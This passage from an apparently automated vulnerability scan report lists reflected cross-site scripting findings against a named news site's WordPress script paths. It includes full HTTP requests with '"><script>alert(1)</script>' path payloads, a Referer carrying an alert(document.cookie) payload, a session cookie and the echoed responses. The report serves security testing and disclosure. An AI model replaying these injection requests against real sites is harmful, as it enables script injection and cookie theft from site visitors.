...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesafa97\"><script>alert(1)</script>7078a85650f/js/jquery/ui.droppable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.361. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9b3"><script>alert(1)</script>7661972d672 was submitted in the REST URL parameter 2. This input was echoed as be9b3\"><script>alert(1)</script>7661972d672 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsbe9b3"><script>alert(1)</script>7661972d672/jquery/ui.droppable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jsbe9b3\"><script>alert(1)</script>7661972d672/jquery/ui.droppable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.362. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec32c"><script>alert(1)</script>20825b10b87 was submitted in the REST URL parameter 3. This input was echoed as ec32c\"><script>alert(1)</script>20825b10b87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryec32c"><script>alert(1)</script>20825b10b87/ui.droppable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jqueryec32c\"><script>alert(1)</script>20825b10b87/ui.droppable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.363. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.droppable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e3a"><script>alert(1)</script>a5cce0ede9d was submitted in the REST URL parameter 4. This input was echoed as d6e3a\"><script>alert(1)</script>a5cce0ede9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.droppable.jsd6e3a"><script>alert(1)</script>a5cce0ede9d?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.droppable.jsd6e3a\"><script>alert(1)</script>a5cce0ede9d?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.364. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e736"><script>alert(1)</script>690b594346e was submitted in the REST URL parameter 1. This input was echoed as 4e736\"><script>alert(1)</script>690b594346e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes4e736"><script>alert(1)</script>690b594346e/js/jquery/ui.resizable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes4e736\"><script>alert(1)</script>690b594346e/js/jquery/ui.resizable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.365. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeee1"><script>alert(1)</script>eb381eb2b86 was submitted in the REST URL parameter 2. This input was echoed as eeee1\"><script>alert(1)</script>eb381eb2b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jseeee1"><script>alert(1)</script>eb381eb2b86/jquery/ui.resizable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:16 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jseeee1\"><script>alert(1)</script>eb381eb2b86/jquery/ui.resizable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.366. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b15"><script>alert(1)</script>c094cfc6fba was submitted in the REST URL parameter 3. This input was echoed as 80b15\"><script>alert(1)</script>c094cfc6fba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery80b15"><script>alert(1)</script>c094cfc6fba/ui.resizable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery80b15\"><script>alert(1)</script>c094cfc6fba/ui.resizable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.367. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.resizable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f12b"><script>alert(1)</script>d80fd94c6a8 was submitted in the REST URL parameter 4. This input was echoed as 7f12b\"><script>alert(1)</script>d80fd94c6a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.resizable.js7f12b"><script>alert(1)</script>d80fd94c6a8?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:25:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:25:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:25:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.resizable.js7f12b\"><script>alert(1)</script>d80fd94c6a8?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.368. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2965"><script>alert(1)</script>a48d1e98cf8 was submitted in the REST URL parameter 1. This input was echoed as a2965\"><script>alert(1)</script>a48d1e98cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesa2965"><script>alert(1)</script>a48d1e98cf8/js/jquery/ui.selectable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:54 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesa2965\"><script>alert(1)</script>a48d1e98cf8/js/jquery/ui.selectable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.369. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6849a"><script>alert(1)</script>55d79ba84cf was submitted in the REST URL parameter 2. This input was echoed as 6849a\"><script>alert(1)</script>55d79ba84cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js6849a"><script>alert(1)</script>55d79ba84cf/jquery/ui.selectable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js6849a\"><script>alert(1)</script>55d79ba84cf/jquery/ui.selectable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.370. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602d0"><script>alert(1)</script>30db3f8d9ab was submitted in the REST URL parameter 3. This input was echoed as 602d0\"><script>alert(1)</script>30db3f8d9ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery602d0"><script>alert(1)</script>30db3f8d9ab/ui.selectable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:10 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery602d0\"><script>alert(1)</script>30db3f8d9ab/ui.selectable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.371. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d72"><script>alert(1)</script>4d7c1edb910 was submitted in the REST URL parameter 4. This input was echoed as 62d72\"><script>alert(1)</script>4d7c1edb910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.selectable.js62d72"><script>alert(1)</script>4d7c1edb910?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
